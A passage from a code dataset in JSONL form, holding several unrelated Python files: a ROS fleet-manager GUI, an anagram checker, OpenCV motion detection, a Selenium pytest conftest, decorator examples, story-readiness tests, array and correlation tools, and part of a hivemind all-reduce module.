Loop over indices_for_removal list in descending order and remove all MEx items no longer existing.\n \"\"\"\n if data.total_mex_number > 0:\n # [1] Take in MEx info, add all MExs in list to a temporary dictionary.\n temp_dict = {} # Empty dictionary in which items will be marked as processed (True) or not (False).\n for mex_info in data.mex_list_info_array:\n temp_dict[str(mex_info.id)] = {\n \"id\" : mex_info.id,\n \"job_id\" : mex_info.job_id,\n \"status\" : mex_info.status,\n \"processed\" : False\n } # Add incoming MEx info to temp_dict as dict and mark as not yet processed.\n\n # [2, 3, 4] First check if current MEx items in the treeWidget require updating or removing.\n root = appGui.treeWidgetMEx.invisibleRootItem()\n child_count = root.childCount()\n indices_for_removal = [] # Empty list to which indices can be appended which can be removed after updating others.\n\n for i in range(child_count): # Iterate over all the existing (top level) items (a.k.a. MExs) in the treeWidgetMEx.\n item = root.child(i)\n mex_id = str(item.text(0))\n\n # Loop over all MEx information lists in the mex_list_info_array, checking if the 'mex_id' is in there.\n for mex_info in data.mex_list_info_array:\n if mex_id == mex_info.id:\n # It's in there, so update the information and mark processed as True.\n item.setText(0, str(mex_info.id) )\n item.setText(1, str(mex_info.status) )\n item.setText(2, str(mex_info.job_id) )\n temp_dict[str(mex_info.id)][\"processed\"] = True # Mark MEx as processed.\n break\n else:\n # The MEx item with its id is no longer in the MEx Sentinel's list, thus mark it for removal.\n indices_for_removal.append(i)\n\n # [5] Check for unprocessed list items, adding them as new items to the MEx treeWidget\n for mex_key in temp_dict:\n if temp_dict[mex_key][\"processed\"] == False:\n mex_item = QtGui.QTreeWidgetItem( [ \n str(temp_dict[mex_key][\"id\"]), \n str(temp_dict[mex_key][\"status\"]),\n str(temp_dict[mex_key][\"job_id\"]) ] )\n appGui.treeWidgetMEx.addTopLevelItem(mex_item)\n \n # [6] Remove items which were marked for removal\n if len(indices_for_removal) != 0:\n # Sort the indices list in descending order (from highest index to lowest index).\n indices_for_removal.sort(reverse=True)\n # Iterate over the sorted list, removing items from the treeWidgetMEx\n for index in indices_for_removal:\n appGui.treeWidgetMEx.takeTopLevelItem(index)\n\nif __name__ == '__main__':\n try: \n # Initialize the node.\n rospy.init_node('fleet_manager_front')\n\n # Set up information update connections.\n rospy.Subscriber('/mex_sentinel/mex_list_info', MexListInfo, mex_list_info_cb) # Subscription to MEx Sentinel for updating Mobile Executors list.\n rospy.Timer(rospy.Duration(1), job_list_cb) # Timer for updating Jobs list.\n \n #region --- GUI ---\n app = QtGui.QApplication(sys.argv)\n appGui = GuiMainWindow()\n windowIcon = QtGui.QIcon()\n windowIcon.addPixmap(QtGui.QPixmap(\":/icons/Fleet ManagerIcon.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n appGui.setWindowIcon(windowIcon)\n\n # Add orders from example_orders.JSON\n filename = \"example_orders.JSON\"\n if not os.path.isfile(filename):\n # File does not exist yet (first time usage). 
Create it first from dictionary.\n order_data = {\n \"0\" : {\n \"keyword\" : \"MOVE\",\n \"priority\" : \"LOW\",\n \"order_args\" : [\"loc03\"]\n },\n \"1\" : {\n \"keyword\" : \"MOVE\",\n \"priority\" : \"MEDIUM\",\n \"order_args\" : [\"loc02\"]\n },\n \"2\" : {\n \"keyword\" : \"TRANSPORT\",\n \"priority\" : \"LOW\",\n \"order_args\" : [\"loc01\", \"loc02\"]\n },\n \"3\" : {\n \"keyword\" : \"LOAD\",\n \"priority\" : \"MEDIUM\",\n \"order_args\" : []\n },\n \"4\" : {\n \"keyword\" : \"UNLOAD\",\n \"priority\" : \"HIGH\",\n \"order_args\" : []\n },\n \"5\" : {\n \"keyword\" : \"TRANSPORT\",\n \"priority\" : \"CRITICAL\",\n \"order_args\" : [\"loc04\", \"loc01\"]\n }\n }\n with open(filename, 'w') as outfile:\n json.dump(order_data, outfile, indent=4)\n pass\n load_orders_from_JSON(filename)\n\n appGui.show()\n app.exec_()\n #endregion\n except rospy.ROSInterruptException:\n pass","sub_path":"src/fleet_manager_front.py","file_name":"fleet_manager_front.py","file_ext":"py","file_size_in_byte":22599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
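The fleet-manager node above repeats one ROS service-call pattern throughout (wait_for_service, ServiceProxy, build a request, try/except around the call). Distilled, it looks like the sketch below; it needs a running ROS master and the rooster_fleet_manager package, and the service name is the one the node itself uses:

```python
import rospy
from rooster_fleet_manager.srv import PlaceOrder, PlaceOrderRequest

def place_one_order(keyword, priority, order_args):
    # Block until the Job Manager advertises the service, then call it.
    rospy.wait_for_service('/job_manager/place_order')
    try:
        place_order = rospy.ServiceProxy('/job_manager/place_order', PlaceOrder)
        req = PlaceOrderRequest()
        req.keyword = keyword
        req.priority = priority
        req.order_args = order_args
        return place_order(req)
    except rospy.ServiceException as e:
        rospy.logerr("Service call failed: %s" % e)
        return None
```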
+{"seq_id":"383090960","text":"\"\"\" --- Directions\nCheck to see if two provided strings are anagrams of eachother.\nOne string is an anagram of another if it uses the same characters\nin the same quantity. Only consider characters, not spaces\nor punctuation. Consider capital letters to be the same as lower case\n--- Examples\n anagrams('rail safety', 'fairy tales') --> True\n anagrams('RAIL! SAFETY!', 'fairy tales') --> True\n anagrams('Hi there', 'Bye there') --> False \"\"\"\nfrom re import sub\n\ndef anagrams(stringA, stringB):\n charMapA = create_char_map(stringA)\n charMapB = create_char_map(stringB)\n\n return charMapA == charMapB\n\ndef create_char_map(string):\n string = ''.join(e for e in string if e.isalpha()).lower()\n d = {}\n for char in string:\n if char in d:\n d[char] += 1\n else:\n d[char] = 1\n return d","sub_path":"anagrams/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"397200770","text":"import cv2 as cv\nimport numpy as np\n\ncap = cv.VideoCapture('vtest.avi')\n\nret, frame1 = cap.read()\nret, frame2 = cap.read()\n\nwhile cap.isOpened() :\n diff = cv.absdiff(frame1, frame2)\n\n gray = cv.cvtColor(diff, cv.COLOR_BGR2GRAY)\n blur = cv.GaussianBlur(gray, (5, 5), 0 )\n __, thresh = cv.threshold(blur, 20, 255, cv.THRESH_BINARY)\n dilated = cv.dilate(thresh, None, iterations=3)\n\n contours, __ = cv.findContours(dilated, cv.RETR_TREE, cv.CHAIN_APPROX_NONE)\n\n #cv.drawContours(frame1, contours, -1, (0, 0, 255), 2, cv.LINE_AA)\n \n \n for contour in contours :\n (x, y, width, height) = cv.boundingRect(contour)\n \n if cv.contourArea(contour) < 700 :\n continue\n \n cv.rectangle(frame1, (x, y), (x+width, y+height), (0, 255, 0), 2, cv.LINE_AA)\n cv.putText(frame1, \"Status : {}\".format('Motion Detected'), (30, 30), cv.FONT_HERSHEY_SIMPLEX,\n 1, (0, 0, 255), 3)\n\n cv.imshow('motion_detection', frame1)\n\n frame1 = frame2\n ret, frame2 = cap.read()\n\n key = cv.waitKey(40) & 0xFF\n if key == ord('q') :\n break\n\ncap.release()\ncv.destroyAllWindows()","sub_path":"45_basic_motion_detection_2.py","file_name":"45_basic_motion_detection_2.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"187539638","text":"from selenium import webdriver\nimport pytest\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\n\n\n@pytest.fixture()\ndef setup(browser):\n if browser == 'chrome':\n # driver = webdriver.Chrome(ChromeDriverManager().install())\n driver = webdriver.Chrome(executable_path=\"/Users/fdomfeh/Downloads/chromedriver\")\n print(\"Launching Chrome browser......\")\n elif browser == \"firefox\":\n # driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n driver = webdriver.Firefox(executable_path=\"/Users/fdomfeh/WorkSpace/hosted-payment-page-tests/drivers/geckodriver\")\n print(\"Launching Firefox browser.......\")\n elif browser == 'Opera':\n driver = webdriver.Opera()\n print(\"Launching Opera browser.......\")\n else:\n driver = webdriver.Safari()\n print(\"Launching Safari browser......\")\n return driver\n\n\n# This will get the value from CLI /hooks\ndef pytest_addoption(parser):\n parser.addoption(\"--browser\")\n\n# This will return the Browser value to setup method\n@pytest.fixture()\ndef browser(request):\n return request.config.getoption(\"--browser\")\n\n############### Generate PyTest HTML Report ################\n# It is hooks for Adding Environment info to HTML Report\n# To access the metadata from a plugin, you can use the _metadata attribute of the config object\n# This can be used to read/add/modify the metadata:\n\ndef pytest_configure(config):\n if hasattr(config, '_metadata'):\n config._metadata['Project Name'] = 'nop commerce'\n config._metadata['Module Name'] = 'Customer'\n config._metadata['Tester'] = 'Frankie'\n\n# It is hook for delete/Modify Environment info to HTML Report\n@pytest.mark.optionalhook\ndef pytest_metadata(metadata):\n metadata.pop(\"JAVA_HOME\", None)\n metadata.pop(\"Plugins\", None)\n","sub_path":"testCases/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"274311281","text":"def entry_exit(f):\n def new_f():\n t = input('something: ')\n print(t)\n print(\"Entering\", f.__name__)\n f()\n print(\"Exited\", f.__name__)\n return new_f\n\n@entry_exit\ndef func1():\n print(\"inside func1()\")\n\n#func1()\n\nimport toolkit\nimport validators\n\n\ndef ping_handler(f):\n #def wrapper():\n hostname = input('Hostname > ')\n echos = input('Enter number of echo requests [25] > ')\n if echos == '':\n echos = '25'\n return f(hostname, echos)\n #return wrapper\n\n\n@ping_handler\ndef get_ping(node, count='25'):\n try:\n print(toolkit.check_ping(node, count=count))\n except AttributeError:\n print('Unable to ping {}; check its syntax'.format(node))\n\n\nget_ping()","sub_path":"p3_essentials/Decorators/decorator7.py","file_name":"decorator7.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"510599703","text":"\nfrom storyready import Story, has_gwt, has_asa, has_rightsize, nosize, has_description, rank\nimport unittest\n\n\nclass TestStoryReady(unittest.TestCase):\n\n def test_two_stories_one_without_gwts(self):\n stories = [Story(1,\"a story with no gwts\",0),\n Story(2,\"Given this When that Then the other etc.\",0)]\n\n no_gwts = has_gwt(stories)\n self.assertEqual(1, len(no_gwts))\n\n def test_two_stories_one_without_asa(self):\n stories = [Story(1,\"a story with no Story format\",0),\n Story(2,\"As a frog I Want a pond So That I can swim\",0)]\n\n no_asas = has_asa(stories)\n self.assertEqual(1, len(no_asas))\n\n def test_three_stories_with_two_without_size(self):\n stories = [Story(1,description=\"story one\"),\n Story(2,description=\"story two\"),\n Story(3,size=100)]\n\n not_sized = nosize(stories)\n self.assertEqual(2,len(not_sized))\n\n def test_three_stories_with_two_no_description(self):\n stories = [Story(1,size=30),\n Story(2,size=10),\n Story(3,description=\"story one\")]\n\n no_description = has_description(stories)\n self.assertEqual(2,len(no_description))\n\n def test_three_stories_with_two_wrong_size(self):\n stories = [Story(1,size=30),\n Story(2,size=10),\n Story(3,size=100)]\n\n not_rightsized = has_rightsize(stories,200,0.3)\n self.assertEqual(1,len(not_rightsized))\n\n def test_rank(self):\n stories = [Story(1,description=\"As a I want So that ... Given this When that Then other \",size=10),\n Story(2,description=\"rubbish description\", size=10),\n Story(3,size=100)]\n\n ranked = rank(stories, 200, 0.3)\n print(ranked)\n self.assertEqual(4,ranked[3]) # story 3 fails on everything except empty size\n self.assertEqual(2,ranked[2]) # story 2 fails on GWT and Story format\n self.assertEqual(False,1 in ranked) # story one is perfect\n","sub_path":"test/test_storyready.py","file_name":"test_storyready.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"336710734","text":"__author__ = 'htelg'\n\nimport numpy as _np\nfrom scipy import stats as _stats\nimport matplotlib.pylab as _plt\nfrom atmPy.tools import plt_tools as _plt_tools\n\ndef find_closest(array, value, how = 'closest'):\n \"\"\"Finds the element of an array which is the closest to a given number and returns its index\n\n Arguments\n ---------\n array: array\n The array to search thru.\n value: float or array-like.\n Number (list of numbers) to search for.\n how: string\n 'closest': look for the closest value\n 'closest_low': look for the closest value that is smaller than value\n 'closest_high': look for the closest value that is larger than value\n\n Return\n ------\n integer or array\n position of closest value(s)\"\"\"\n\n if _np.any(_np.isnan(array)) or _np.any(_np.isnan(value)):\n txt = '''Array or value contains nan values; that will not work'''\n raise ValueError(txt)\n\n if type(value).__name__ in ('float', 'int', 'float64', 'int64'):\n single = True\n value = _np.array([value], dtype=float)\n\n elif type(value).__name__ in ('list', 'ndarray'):\n single = False\n pass\n\n else:\n raise ValueError('float,int,array or list are ok types for value. You provided %s' % (type(value).__name__))\n\n out = _np.zeros((len(value)), dtype=int)\n for e, i in enumerate(value):\n nar = array - i\n if how == 'closest':\n pass\n elif how == 'closest_low':\n nar[nar > 0] = array.max()\n elif how == 'closest_high':\n nar[nar < 0] = array.max()\n else:\n txt = 'The keyword argument how has to be one of the following: \"closest\", \"closest_low\", \"closest_high\"'\n raise ValueError(txt)\n out[e] = _np.abs(nar).argmin()\n if single:\n out = out[0]\n return out\n\n\ndef reverse_binary(variable, no_bits):\n \"\"\"This converts all numbers into binary of length no_bits. Then it reverses the\n binaries and finally converts it into integer again.\n This is usefull for quality flags that are often represented in integers of\n which each position of the corresponding binary tells you something about a\n different qualty criteria. Sometimes bad values are at the beginning sometimes\n at the end and reversing is desired.\n\n Parameters\n ==========\n variable: ndarray or pandas object\n\n Returns\n =======\n what ever you put in\n\n Examples\n ========\n >>> a = np.array([1,0,0,2,0,8])\n >>> array_tools.reverse_binary(a,4)\n array([8, 0, 0, 4, 0, 1])\n \"\"\"\n variable = variable.copy()\n rep = '{0:0%sb}'%no_bits\n func = _np.vectorize(lambda i: int(rep.format(i)[::-1],2))\n variable[:] = func(variable)\n return variable\n\n\nclass Correlation(object):\n def __init__(self, data, correlant, remove_zeros = True, index = False):\n \"\"\"This object is for testing correlation in two two data sets.\n\n Parameters\n ----------\n data and correlant: 1D arry\n These are the two data set which are compared\n remove_zeros: bool\n If zeros ought to be deleted. Datasets often contain zeros that are the\n result of invalid data. 
If there is the danger that this introduces a\n bias, set it to False\"\"\"\n\n data = data.copy()\n correlant = correlant.copy()\n self.__pearson_r = None\n self.__linear_regression = None\n self.__linear_regression_function = None\n self.__linear_regression_zero = None\n self.__linear_regression_zero_function= None\n\n if remove_zeros:\n correlant = correlant[data != 0]\n if type(index) != bool:\n index = index[data != 0]\n data = data[data != 0]\n\n data = data[correlant != 0]\n if type(index) != bool:\n index = index[correlant != 0]\n correlant = correlant[correlant != 0]\n\n # nans have to be removed\n correlant = correlant[~ _np.isnan(data)]\n if type(index) != bool:\n index = index[~ _np.isnan(data)]\n data = data[~ _np.isnan(data)]\n\n data = data[~ _np.isnan(correlant)]\n if type(index) != bool:\n index = index[~ _np.isnan(correlant)]\n correlant = correlant[~ _np.isnan(correlant)]\n\n self._data = data\n self._correlant = correlant\n self._index = index\n self._x_label_correlation = 'Data'\n self._y_label_correlation = 'Correlant'\n self._x_label_orig = 'Item'\n self._y_label_orig_data = 'Data'\n self._y_label_orig_correlant = 'Correlant'\n\n @property\n def pearson_r(self):\n if not self.__pearson_r:\n self.__pearson_r = _stats.pearsonr(self._data, self._correlant)\n return self.__pearson_r\n\n @property\n def linear_regression(self):\n if not self.__linear_regression:\n self.__linear_regression = _stats.linregress(self._data, self._correlant)\n return self.__linear_regression\n\n @property\n def linear_regression_zero_intersect(self):\n if not self.__linear_regression_zero:\n x = self._data\n x = x[:, _np.newaxis]\n self.__linear_regression_zero = _np.linalg.lstsq(x, self._correlant)\n return self.__linear_regression_zero\n\n @property\n def linear_regression_function(self):\n if not self.__linear_regression_function:\n self.__linear_regression_function = lambda x: x * self.linear_regression.slope + self.linear_regression.intercept\n return self.__linear_regression_function\n\n @property\n def linear_regression_zero_intersect_function(self):\n if not self.__linear_regression_zero_function:\n self.__linear_regression_zero_function = lambda x: x * self.linear_regression_zero_intersect[0]\n return self.__linear_regression_zero_function\n\n # todo: allow xlim and ylim to be tuples so you can define a limit range rather than just the upper limit\n def plot_pearson(self, zero_intersect = False, gridsize = 100, cm = 'auto', xlim = None,\n ylim = None, p_value = True, colorbar = False, ax = None, text_pos = (0.1,0.9), **kwargs):\n \"\"\"\n\n Parameters\n ----------\n gridsize:\n cm: matplotlib.color map\n xlim: int or float\n upper limit of x. Similar to set_xlim(right = ...) 
in addition it\n adjusts the gridsize so hexagons are not getting stretched\n ylim: int or float\n as xlim just for y-axis\n p_value: bool\n if the p-value is given in the text box\n colorbar: bool\n ax: bool or matplotlib.Axes instance\n If desired to plot on another axes.\n kwargs\n\n Returns\n -------\n\n \"\"\"\n if not ax:\n f,a = _plt.subplots()\n else:\n f = ax.get_figure()\n a = ax\n\n ratio = 14/20 #at this ratio hexagons look symmetric at the particular setting\n\n a.set_xlabel(self._x_label_correlation)\n a.set_ylabel(self._y_label_correlation)\n\n if cm == 'auto':\n cm = _plt.cm.copper_r\n\n cm.set_under('w')\n\n # compute the grid size in both directions even when no limits are given;\n # previously this block was nested under \"if xlim:\" and gridsize_new was\n # undefined whenever xlim was None\n if xlim and type(xlim).__name__ in ['int', 'float']:\n xratio = self._data.max() / xlim\n gridsize_x = int(gridsize * xratio)\n else:\n gridsize_x = gridsize\n\n if ylim:\n yratio = self._correlant.max() / ylim\n gridsize_y = int(ratio * gridsize * yratio)\n else:\n gridsize_y = int(gridsize * ratio)\n\n gridsize_new = (gridsize_x, gridsize_y)\n\n hb = a.hexbin(self._data, self._correlant, gridsize=gridsize_new, cmap=cm, vmin = 0.001, **kwargs)\n\n if xlim:\n a.set_xlim(right=xlim)\n if ylim:\n a.set_ylim(top=ylim)\n\n if colorbar:\n f.colorbar(hb, ax = a)\n# linreg_func = lambda x: x * linreg.slope + linreg.intercept\n # data.min()\n\n x_reg_func = _np.array([self._data.min(), self._data.max()])\n\n if zero_intersect:\n y_reg_func = self.linear_regression_zero_intersect_function(x_reg_func)\n slope = self.linear_regression_zero_intersect[0]\n intersect = 0\n std = (self._correlant - self.linear_regression_zero_intersect_function(self._data)).std()\n else:\n y_reg_func = self.linear_regression_function(x_reg_func)\n slope = self.linear_regression.slope\n intersect = self.linear_regression.intercept\n # std = self.linear_regression.stderr\n std = (self._correlant - self.linear_regression_function(self._data)).std()\n\n color = _plt_tools.color_cycle[2]\n a.plot(x_reg_func, y_reg_func, lw = 2, color = color)\n\n\n txt = '$r = %0.2f$'%(self.pearson_r[0])\n txt += '\\n$r^2 = %0.2f$' % ((self.pearson_r[0])**2)\n # if p_value:\n txt += '\\n$p = %0.2f$'%(self.pearson_r[1])\n txt += '\\n$m = %0.2f$'%(slope)\n txt += '\\n$c = %0.2f$'%(intersect)\n txt += '\\n$std = %0.2f$'%(std)\n\n props = dict(boxstyle='round', facecolor='white', alpha=0.5)\n\n a.text(text_pos[0],text_pos[1], txt, transform=a.transAxes, horizontalalignment='left', verticalalignment='top', bbox = props)\n return a\n\n def plot_original_data(self, ax = None, **kwargs):\n if not ax:\n f,a = _plt.subplots()\n else:\n f = ax.get_figure()\n a = ax\n\n a.set_xlabel(self._x_label_orig)\n\n if type(self._index) != bool:\n a.plot(self._index, self._data, linewidth = 2, color = _plt_tools.color_cycle[0], **kwargs)\n else:\n a.plot(self._data, linewidth = 2, color = _plt_tools.color_cycle[0], **kwargs)\n\n g = a.get_lines()[-1]\n g.set_marker('.')\n\n a.set_ylabel(self._y_label_orig_data)\n\n a.tick_params(axis = 'y', left = True, color = _plt_tools.color_cycle[0], zorder = 99)\n a.spines['left'].set_color(_plt_tools.color_cycle[0])\n a.spines['left'].set_zorder(99)\n\n a2 = a.twinx()\n if type(self._index) != bool:\n a2.plot(self._index,self._correlant, linewidth = 2, color = _plt_tools.color_cycle[1], **kwargs)\n else:\n a2.plot(self._correlant, linewidth = 2, color = _plt_tools.color_cycle[1])\n\n g = a2.get_lines()[-1]\n g.set_marker('.')\n\n a2.set_ylabel(self._y_label_orig_correlant)\n\n a2.tick_params(axis = 'y', right = True, color = _plt_tools.color_cycle[1])\n 
a2.spines['right'].set_color(_plt_tools.color_cycle[1])\n a2.spines['left'].set_visible(False)\n\n\n if type(self._index).__name__ == 'DatetimeIndex':\n # f.autofmt_xdate()\n _plt.setp(a.xaxis.get_majorticklabels(), rotation=30 )\n return a, a2\n\n def plot_pearsonANDoriginal_data(self, gridsize = 20, zero_intersect = False, xlim = None, ylim = None, cm = 'auto', p_value = True, width_ratio = [1.5, 2], corr_kwargs = {}, orig_kwargs = {}):\n f, (a_corr, a_orig) = _plt.subplots(1,2, gridspec_kw = {'width_ratios':width_ratio})\n f.set_figwidth(f.get_figwidth()*1.7)\n a1 = self.plot_pearson(zero_intersect = zero_intersect, gridsize=gridsize, cm = cm, xlim = xlim, ylim = ylim, p_value=p_value, ax = a_corr, **corr_kwargs)\n a2,a3 = self.plot_original_data(ax = a_orig, **orig_kwargs)\n return a1, a2, a3\n","sub_path":"atmPy/tools/array_tools.py","file_name":"array_tools.py","file_ext":"py","file_size_in_byte":11499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
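A usage sketch for the `Correlation` helper above on synthetic data (the linear relation and noise level are made up for illustration):

```python
import numpy as np

rng = np.random.RandomState(0)
x = rng.rand(500) * 10
y = 2.0 * x + rng.normal(scale=1.0, size=500)  # roughly y = 2x + noise

corr = Correlation(x, y, remove_zeros=False)
print(corr.pearson_r)                # (r, p-value) from scipy.stats.pearsonr
print(corr.linear_regression.slope)  # close to 2.0
print(corr.linear_regression_zero_intersect[0])  # least-squares slope through 0
# corr.plot_pearson()  # hexbin plus regression line; needs a display backend
```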
+{"seq_id":"181689806","text":"import asyncio\nfrom typing import Sequence, Set, Dict, Tuple, Iterable, AsyncIterator, Any\n\nimport grpc\nimport torch\n\nfrom hivemind.utils import Endpoint, get_logger, ChannelCache, anext\nfrom hivemind.utils import serialize_torch_tensor, deserialize_torch_tensor, split_for_streaming, combine_from_streaming\nfrom hivemind.proto import averaging_pb2_grpc, runtime_pb2, averaging_pb2\n\n# flavour types\nGroupID = bytes\nlogger = get_logger(__name__)\n\n\nclass AllReduceProtocol:\n \"\"\"\n An internal class that runs butterfly AllReduce in a predefined group of averagers\n\n :param tensors: local tensors that should be averaged with groupmates\n :param endpoint: your endpoint, must be included in ordered_group_endpoints\n :param ordered_group_endpoints: group endpoints ordered s.t. i-th endpoint is responsible for averaging i-th part\n :param part_sizes: for each peer, a number of vector elements that this peer is responsible for averaging\n :param return_deltas: if True, returns the element-wise differences (averaged_tensors - original_tensors)\n default (False) - return averaged_tensors by themselves\n \"\"\"\n\n def __init__(self, *, group_id: GroupID, tensors: Sequence[torch.Tensor], endpoint: Endpoint,\n ordered_group_endpoints: Sequence[Endpoint], part_sizes: Tuple[int, ...], return_deltas: bool = False):\n assert endpoint in ordered_group_endpoints, \"endpoint is not a part of the group\"\n self.group_id, self.endpoint = group_id, endpoint\n self.ordered_group_endpoints, self.part_sizes = ordered_group_endpoints, part_sizes\n self.local_tensor_parts = dict(zip(ordered_group_endpoints, split_into_parts(tensors, part_sizes)))\n self.tensor_shapes = tuple(tensor.shape for tensor in tensors)\n self.return_deltas = return_deltas\n\n self.accumulator = self.local_tensor_parts[self.endpoint].clone() # sum inputs from peers to this tensor\n self.accumulated_from: Set[Endpoint] = {self.endpoint} # peers that we have accumulated our part from\n self.averaged_part: asyncio.Future[torch.Tensor] = asyncio.Future() # will be set to [accumulator / group size]\n self.averaged_tensor_parts: Dict[Endpoint, torch.Tensor] = {} # averaged chunks from all peers will be put here\n self.future: asyncio.Future[Sequence[torch.Tensor]] = asyncio.Future() # final result or exception\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.endpoint}, group_size={self.group_size})\"\n\n def __await__(self):\n return self.future.__await__()\n\n def __contains__(self, endpoint: Endpoint):\n return endpoint in self.local_tensor_parts\n\n @property\n def group_size(self):\n return len(self.ordered_group_endpoints)\n\n async def accumulate_part(self, source: Endpoint, remote_part: torch.Tensor) -> torch.Tensor:\n \"\"\" Add vector part to accumulator, wait for all other vectors to be added, then return the average part \"\"\"\n assert not self.averaged_part.done(), f\"already finished averaging part: {self.averaged_part}\"\n assert not self.future.done(), f\"already finished allreduce: {self.future}\"\n assert source in self.local_tensor_parts, \"unexpected source, not a part of current group\"\n assert source not in self.accumulated_from, \"duplicate source, already received that part\"\n logger.debug(f\"{self} - accumulating tensor part from {source}\")\n\n self.accumulator.add_(remote_part)\n self.accumulated_from.add(source)\n\n assert len(self.accumulated_from) <= self.group_size\n if len(self.accumulated_from) == len(self.local_tensor_parts):\n average_result = 
self.accumulator.div_(len(self.accumulated_from))\n self.register_averaged_part(self.endpoint, average_result)\n self.averaged_part.set_result(average_result)\n\n return await self.averaged_part\n\n def register_averaged_part(self, source: Endpoint, averaged_part: torch.Tensor):\n assert not self.future.done(), f\"already finished allreduce: {self.future}\"\n assert source in self.local_tensor_parts, \"the provider of averaged part is not from my group\"\n assert source not in self.averaged_tensor_parts, \"already registered the average from this peer\"\n assert averaged_part.shape == self.local_tensor_parts[source].shape, \"averaged part shape mismatch\"\n assert averaged_part.dtype == self.local_tensor_parts[source].dtype, \"averaged part dtype mismatch\"\n logger.debug(f\"{self} - receiving averaged tensor part from {source}\")\n self.averaged_tensor_parts[source] = averaged_part\n if len(self.averaged_tensor_parts) == len(self.local_tensor_parts):\n ordered_averaged_parts = [self.averaged_tensor_parts[endpoint] for endpoint in self.ordered_group_endpoints]\n outputs = restore_from_parts(ordered_averaged_parts, self.tensor_shapes)\n\n if self.return_deltas:\n local_parts = [self.local_tensor_parts[peer] for peer in self.ordered_group_endpoints]\n with torch.no_grad():\n original_tensors = restore_from_parts(local_parts, self.tensor_shapes)\n for averaged_tensor, original_tensor in zip(outputs, original_tensors):\n averaged_tensor -= original_tensor\n\n self.future.set_result(outputs)\n\n def cancel(self) -> bool:\n if not self.future.done():\n logger.debug(f\"{self} - cancelled\")\n self.future.cancel()\n if not self.averaged_part.done():\n self.averaged_part.cancel()\n return True\n else:\n logger.debug(f\"{self} - failed to cancel, allreduce is already finished: {self.future}\")\n return False\n\n def set_exception(self, exception: Exception) -> bool:\n if not self.future.done():\n logger.debug(f\"{self} - {exception}\")\n self.future.set_exception(exception)\n if not self.averaged_part.done():\n self.averaged_part.cancel()\n return True\n else:\n logger.debug(f\"{self} - failed to set {exception}, allreduce already finished: {self.future}\")\n return False\n\n\nclass AllReduceRunner(AllReduceProtocol, averaging_pb2_grpc.DecentralizedAveragingServicer):\n \"\"\"\n A class that implements ButterflyAllReduceProtocol on top of a gRPC servicer\n \"\"\"\n\n def __init__(self, *, group_id: GroupID, tensors: Sequence[torch.Tensor], endpoint: Endpoint,\n ordered_group_endpoints: Sequence[Endpoint], compression_type: runtime_pb2.CompressionType,\n chunk_size_bytes: int, part_sizes: Tuple[int, ...], group_key_seed: int, gathered: Sequence[Any] = (),\n return_deltas: bool = False):\n super().__init__(group_id=group_id, tensors=tensors, endpoint=endpoint, part_sizes=part_sizes,\n ordered_group_endpoints=ordered_group_endpoints, return_deltas=return_deltas)\n self.compression_type, self.chunk_size_bytes, self.gathered = compression_type, chunk_size_bytes, gathered\n self.averaged_part_stream: asyncio.Future[Tuple[runtime_pb2.Tensor, ...]] = asyncio.Future()\n self.group_key_seed = group_key_seed\n\n def _get_peer_stub(self, peer: Endpoint) -> averaging_pb2_grpc.DecentralizedAveragingStub:\n return ChannelCache.get_stub(peer, averaging_pb2_grpc.DecentralizedAveragingStub, aio=True)\n\n async def _communicate_with_peer(self, peer_endpoint: Endpoint, local_part: torch.Tensor) -> torch.Tensor:\n \"\"\" Send a part of local tensors and metadata to a single peer, receive the average for that part of 
tensors \"\"\"\n serialized_tensor_part = serialize_torch_tensor(local_part, self.compression_type, allow_inplace=False)\n chunks = split_for_streaming(serialized_tensor_part, self.chunk_size_bytes)\n\n stream = self._get_peer_stub(peer_endpoint).rpc_aggregate_part()\n await stream.write(averaging_pb2.AveragingData(code=averaging_pb2.PART_FOR_AVERAGING, group_id=self.group_id,\n endpoint=self.endpoint, tensor_part=next(chunks)))\n for chunk in chunks:\n await stream.write(averaging_pb2.AveragingData(tensor_part=chunk))\n await stream.done_writing()\n\n outputs: Sequence[averaging_pb2.AveragingData] = [message async for message in stream]\n code = outputs[0].code if outputs else averaging_pb2.INTERNAL_ERROR\n if code != averaging_pb2.AVERAGED_PART:\n raise AllreduceException(f\"peer {peer_endpoint} returned {averaging_pb2.MessageCode.Name(code)}\"\n f\" instead of {averaging_pb2.MessageCode.Name(averaging_pb2.AVERAGED_PART)},\"\n f\" allreduce failed\")\n\n averaged_part = deserialize_torch_tensor(combine_from_streaming([message.tensor_part for message in outputs]))\n self.register_averaged_part(peer_endpoint, averaged_part)\n return averaged_part\n\n async def _send_error_to_peer(self, peer_endpoint: Endpoint, code: averaging_pb2.MessageCode):\n stream = self._get_peer_stub(peer_endpoint).rpc_aggregate_part()\n await stream.write(averaging_pb2.AveragingData(group_id=self.group_id, endpoint=self.endpoint, code=code))\n await stream.done_writing()\n\n async def run(self) -> Sequence[torch.Tensor]:\n \"\"\"\n send allreduce requests to all peers and collect results, return the averaged tensor (or deltas)\n \"\"\"\n try:\n await asyncio.gather(self, *(self._communicate_with_peer(peer, part)\n for peer, part in self.local_tensor_parts.items() if peer != self.endpoint))\n return await self\n except BaseException as e:\n code = averaging_pb2.CANCELLED if isinstance(e, asyncio.CancelledError) else averaging_pb2.INTERNAL_ERROR\n logger.debug(f\"{self} - notifying peers about {averaging_pb2.MessageCode.Name(code)}\")\n self.set_exception(e)\n for peer_endpoint in self.ordered_group_endpoints:\n if peer_endpoint != self.endpoint:\n 